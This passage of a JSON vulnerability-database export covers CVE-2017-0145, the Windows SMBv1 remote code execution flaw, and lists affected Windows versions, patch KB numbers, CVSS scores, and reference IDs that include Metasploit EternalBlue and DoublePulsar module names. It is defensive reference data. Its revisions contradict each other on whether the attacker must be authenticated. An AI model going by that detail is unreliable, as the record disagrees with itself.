"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB4014077", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are needed (the CVSS vectors recorded below are Au:N / PR:N).\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4014077", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", "KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4014077", "KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": 